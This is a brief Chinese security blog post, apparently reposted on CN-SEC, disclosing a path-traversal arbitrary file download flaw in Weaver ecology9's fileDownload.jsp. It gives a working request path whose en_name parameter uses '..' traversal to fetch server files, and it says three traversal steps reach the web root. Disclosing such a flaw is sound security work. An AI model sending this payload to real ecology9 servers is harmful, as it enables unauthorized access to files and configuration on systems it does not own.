稻草人博客-泛微ecology9任意文件下载

2023年6月15日10:46:30已关闭评论96 views字数 223阅读0分44秒阅读模式

fileDownload.jsp获取可控的en_name参数进行文件下载，由于未过滤“../”所以可通过目录穿越的方式下载任意文件
blockchain

请求包输入

//system/upgradetoe9/fileDownload.jsp?en_name=\..\RecoverMain.jsp&cn_name=文件名

该文件路径为system\upgradetoe9\resource需要穿越三次到达根目录
blockchain

该漏洞或许已经公开原因，世面上修复的比较全面

本文由 admin 发表于 2023年6月15日10:46:30
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
稻草人博客-泛微ecology9任意文件下载https://cn-sec.com/archives/1803628.html

用于批量Linux资源应急响应检查